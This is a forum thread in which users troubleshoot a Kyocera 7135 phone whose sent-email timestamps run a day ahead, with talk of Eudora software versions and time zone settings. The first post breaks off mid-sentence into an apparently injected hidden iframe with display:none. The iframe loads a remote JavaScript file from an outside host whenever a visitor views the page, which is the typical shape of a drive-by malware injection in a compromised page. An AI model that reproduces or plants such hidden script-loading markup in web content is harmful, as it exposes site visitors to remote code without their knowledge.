+ Reply to Thread
Results 1 to 6 of 6
  1. #1
    Registered User
    Join Date
    10-16-2003
    Location
    San Jose, CA
    Posts
    25

    Send email timestamp

    When I send an email, the "Sent" timestamp is a day into the future of actual.

    Anyone else experience this sort of thing & find a solution?

    Or, would anyone like to have this feature <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-16-2003
    Location
    San Jose, CA
    Posts
    25
    Maybe I should just swap for another phone with Verizon? Currently using software 36/23 which is running very stable, not sure if software upgrade would help.

  3. #3
    Registered User
    Join Date
    09-07-2003
    Posts
    86
    I had a similar issue.

    Testing the email capabilities, I sent my computer some emails. I have a spam filter on my server and when I would get my email, it would be tagged as spam mostly due to incorrect dating and a forged eudora header.

    I downloaded and install the 2.1 version of the eudora software and all is well.

    Here is the link at Kyocera's website:
    http://www.kyocera-wireless.com/downloads/EIS_2.1.exe
    Evan

  4. #4
    Registered User
    Join Date
    10-16-2003
    Location
    San Jose, CA
    Posts
    25
    Evan,

    When I check the version number, I believe I have EIS 2.1 . When I go to check version numbers on the handheld, it shows Eudora v.2.1.1, Eudora email v.1.0. Is this what works for you?

    Thanks - Leo

  5. #5
    Registered User
    Join Date
    09-07-2003
    Posts
    86
    Eudora Web shows as 2.1 and Eudora email is 2.1.1

    Also, check you time zone setting under Prefs PDA - Date & Time
    Evan

  6. #6
    Registered User
    Join Date
    10-16-2003
    Location
    San Jose, CA
    Posts
    25
    Evan,

    I downloaded & installed latest EIS from your link. The version numbers did update. Thanks!

    Sent a couple of emails, sent time stamp is still wacked. Did a soft reset of the 7135, sent new messages, no change.

    However, the received timestamp on my desktop from the test messages is fine, which is what is important.

    I'm beginning to think I should just let this problem go. It's probably something to do with the handoff/relay between Verizon and SBCGlobal.net, my email provider. Probably nothing to do with the 7135, which is working SWEET!!

    Thanks for your help!!

    Leo

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts